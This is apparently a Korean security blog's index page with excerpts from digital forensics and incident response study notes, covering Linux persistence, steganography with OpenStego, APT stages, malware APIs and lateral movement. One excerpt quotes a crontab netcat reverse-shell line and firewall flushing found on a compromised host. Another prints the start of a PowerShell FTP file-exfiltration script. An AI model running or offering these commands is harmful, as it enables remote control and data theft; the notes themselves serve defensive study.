전체 글
-
-
침해사고대응 공부_day 1카테고리 없음 2020. 4. 17. 18:45
/etc/profile 이란 해당 시스템의 모든 사용자가 로그인 될 때 실행되는 스크립트 파일이다. ~/.profile 이란 해당 사용자가 로그인 될 때 실행되는 스크립트 파일이다. * 리눅스 부팅순서를 이해할 필요가 있다. * 쉘 공부필요 ~/.bashrc란 * HISTSIZE=0 이란 history명령어의 기록이 저장되지 않음. alias들이 되어있는 것을 확인할 수 있다. crontab -e를 실행한 화면에서 두 개의 예약을 확인할 수 있다. iptables -F는 방화벽로그를 5분에 한번 씩 삭제한다는 의미다. mkfifo fifo; cat fifo|/bin/sh -i 2>&1 | nc 7331 > fifo는 1분에 한번 씩 7331포트로 접속한다는 의미다. Crontab -e: 현재 등록된 크론..
-
파일을 숨기는 방법카테고리 없음 2020. 3. 18. 11:02
준비 프로그램: OpenStego, Bandizip(또는 압축할 수 있는 도구) 1. 숨길 파일들을 준비한다. ("숨겨야 되는 파일.hwp") 2. 숨길 파일들을 Bandizip 프로그램을 이용하여 압축한다. 3. OpenStego 실행 4. OpenStego 숨기기 * Message File: 숨길파일 * Cover File: 감출파일 * Output Stego File: 출력파일 _ 내가 이름을 지은 파일이름으로 생성된다. * Options: 패스워드를 설정할 경우 추후에 추출할 때 패스워드 검증을 하게된다. (미설정해도 상관없음) 5. 숨긴파일 확인 스테가노그래피가 적용 된 사진과 정상적인 사진을 비교하면 시각적인 면에서 둘의 차이를 찾기 어렵다. 하지만, jpg였던 원본파일이 OpenStego 도..
-
NEWSECU CHALLENGE 1회 대회운영 후기!!워라벨/경험(성찰, 마인드, 후기) 2020. 2. 16. 14:24
평소 디지털 포렌식 & 침해사고대응 대회 참여기회가 많지 않았던것 같다. 그래서 아무래도 저희 팀이 DFIR을 전문적으로 공부하는 팀이다 보니 이번에는 CHALLENGE로 네이밍을 해서 DFIR컨셉을 확실하게 잡고 대회를 진행했다. 다음대회 때는 실제 기업환경을 수사하는 되는 느낌이 들도록 문제의 기획이나 작업환경 퀄리티를 신경쓸 생각이다. 아무래도 비영리 단체이며.. 작업환경도 좋지 않다보니.. 문제의 퀄과 난이도를 더 높이는 데 많은 어려움이 따랐다.. 변명으로 들릴 수 있겠지만.. 작업환경이 좋았다면 문제의 퀄과 난이도는 지금보다 더 높일 수 있었다.... ㅠㅠ... [ 홍보 - 회의 - 제작 - 검수 - 출제 ] 올해는 작업환경을 어떻게 해야될지 좀 더 방안을 찾아보면서 대회준비를 미리 해야겠다...
-
APT 공격진척도카테고리 없음 2020. 2. 11. 12:29
침입 스피어피싱 * 한글문서: 매크로(Macro = Visual Basic Script, Java Script, Powershell, Post Script), 첨부기능, DDE 그 외 여러개(보완 필요) * Word: 매크로(Macro = Visual Basic Script) * PDF: 파일첨부기능, Zero-day, One-day ... PC 내 탐색 - 네트워크 - PC 내 파일 및 시스템정보 유출 - #업로드 경로(전송할 파일 위치) $Dir="D:/www/attend/" #ftp정보 $ftp = "ftp://ftp주소/" $user = "ftp아이디" $pass = "ftp패스워드" $webclient = New-Object System.Net.WebClient $webclient.Credent..
-
악성코드가 주로 사용하는 API카테고리 없음 2020. 2. 10. 19:40
https://teletubby.tistory.com/entry/Malware%EC%95%85%EC%84%B1-%EC%BD%94%EB%93%9C%EC%97%90%EC%84%9C-%EC%9E%90%EC%A3%BC-%EB%B3%B4%EC%9D%B4%EB%8A%94-WIN-APIWin32-%EB%AA%A8%EC%9D%8C-AZ Malware(악성 코드)에서 자주 보이는 WIN API(Win32) 모음, A-Z 원본 https://resources.infosecinstitute.com/windows-functions-in-malware-analysis-cheat-sheet-part-1/#article 좋은 네트워크 기반(good Network-based)란 네트워크 프로토콜을 해석한다는 이야기 Accept 이...
-
래터럴 무브먼트(Lateral Movement)DFIR 2020. 1. 3. 19:53
래터럴 무브먼트란 쉽게 얘기하면 내부확산이다. 주로 APT(Advanced Persistent Threat)공격에 쓰이며, 기업의 내의 A 컴퓨터에서 중요한 정보를 담고있는 내부의 다른 시스템으로 이동해나가며 확산해나가는데 이 과정이 래터럴 무브먼트라고 생각하면 될 것 같다. 대부분의 보안장비들은 외부에서 내부로 진입하는데에만 집중된 상태라 내부망에서 내부에서 내부로 이동하는 것은 자유로운 편이다. 내부망 이동시 공격자들이 주로 사용하는 방법은 시스템 접근을 위해 인증정보(크리덴셜)를 훔친 후 이를 이용해 내부망의 다른 시스템으로 이동하는 것이다. 훔친 인증정보가 해시일 경우 이를 패스 더 해시(Pass-the-hash)공격이라고 부른다. 크리덴셜을 훔치기 위한 도구는 주로 미미카츠(Mimikatz)가 ..